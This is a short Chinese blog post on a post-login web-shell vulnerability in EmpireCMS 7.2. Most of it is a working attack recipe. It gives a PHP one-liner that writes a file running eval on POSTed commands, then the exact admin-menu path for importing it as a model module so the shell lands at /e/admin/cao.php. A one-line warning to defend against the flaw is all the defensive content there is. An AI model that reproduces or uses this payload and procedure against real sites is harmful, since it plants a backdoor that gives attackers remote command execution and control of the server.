帝国cms7.2后台getshell漏洞

2025-09-26 18:46:52

1、php一句话内容:

<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?>

保存为1.php.mod

进入后台---系统设置---管理数据表---管理系统模型---导入新型模块

导入之后马儿就躺在了/e/admin/cao.php。

帝国cms7.2后台getshell漏洞

帝国cms7.2后台getshell漏洞

2、所以大家用帝国cms的要防范这个漏洞,纯属干货分享。

声明:本网站引用、摘录或转载内容仅供网站访问者交流或参考,不代表本站立场,如存在版权或非法内容,请联系站长删除,联系邮箱:site.kefu@qq.com。
猜你喜欢